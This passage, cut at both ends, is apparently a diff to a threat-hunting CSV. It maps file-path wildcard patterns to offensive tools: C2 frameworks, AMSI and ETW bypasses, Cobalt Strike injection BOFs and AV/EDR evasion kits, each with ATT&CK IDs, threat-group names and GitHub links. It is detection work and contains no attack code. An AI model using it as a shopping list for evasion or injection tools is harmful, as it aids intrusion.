TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*/implant/elevate/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/implant/register_cmd*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*/implants/*/Syscalls.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/implants/*/Syscalls.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/impress-remote-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*/infection_monkey/*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/infection_monkey/*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/Infoga*","offensive_tool_keyword","Infoga","Email Information Gathering.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/m4ll0k/Infoga","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*/informix-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/informix-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3991,58 +4011,60 @@ "*/Inject/Dll/LoadDll*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Inject/PE/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Inject/ShellCode/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/injectAmsiBypass/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","362","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*/injectAmsiBypass/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*/inject-assembly/*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*/injectEtw.*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" -"*/Injection/clipboard/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/conhost/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/createremotethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/ctray/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/dde/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/Injection.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/kernelcallbacktable*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/ntcreatethread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/ntcreatethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/ntqueueapcthread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/setthreadcontext*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/svcctrl/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 